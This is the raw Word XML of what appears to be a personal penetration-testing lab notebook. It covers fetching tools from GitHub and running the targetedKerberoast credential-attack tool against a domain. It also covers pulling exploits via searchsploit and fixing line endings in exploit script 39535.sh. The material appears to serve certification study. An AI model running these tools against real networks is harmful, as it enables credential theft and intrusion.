    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032ED">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kp5xdswd7c83" w:id="448"/>
      <w:bookmarkEnd w:id="448"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want something like: https://github.com/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP/AppSec-Browser-Bundle/blob/master/utilities/ZAP/dirbuster/directory-list-2.3-big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [FILENAME] [raw_github_URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find raw_github_URL, click on the Raw button on the top right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="406400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="372" name="image372.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image372.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1117"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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32F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will start with </w:t>
      </w:r>
      <w:hyperlink r:id="rId1118">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://raw.githubusercontent.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the command asks you for target URL, make sure to add the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it only asks for IP, then don't include the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a whole repo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a whole gitrepo, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone [URL].git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003300">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003301">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ueyrkopg6a2x" w:id="449"/>
      <w:bookmarkEnd w:id="449"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download software with requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003302">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/ShutdownRepo/targetedKerberoast.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's python, install python and pip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install python3 python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd targetedKerberoast</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003308">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 targetedKerberoast.py -v -d "your_domain" -u "your_username" -p "your_password"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7pattia3hxx" w:id="450"/>
      <w:bookmarkEnd w:id="450"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember exploitdb is the same as searchsploit so if you ever want to download something from exploitdb, just look it up on searchsploit since searchsploit is easier to download from. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AND ALSO, one time, in XXXXXXXXX-A .145, the exploit didn't work when I downloaded from exploitDB but it worked when I downloaded it from searchsploit. It must be some formatting issues when you try curling it or downloading it from exploitdb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Especially useful when you don't know the format of the file, so you don't know what to save the exploit as. The file will have the extension on searchsploit!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003311">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111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3312">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the XXXXXXXXX-A Challenge lab, I remember getting an error like this from an exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-bash: ./39535.sh:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh^M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: bad interpreter: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003314">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, apparently this is common and has to do with the exploit using windows new lines character </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To fix this, we just run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i -e "s/^M//" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">39535.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace with your exploit name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"^M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in linux, press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + V </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
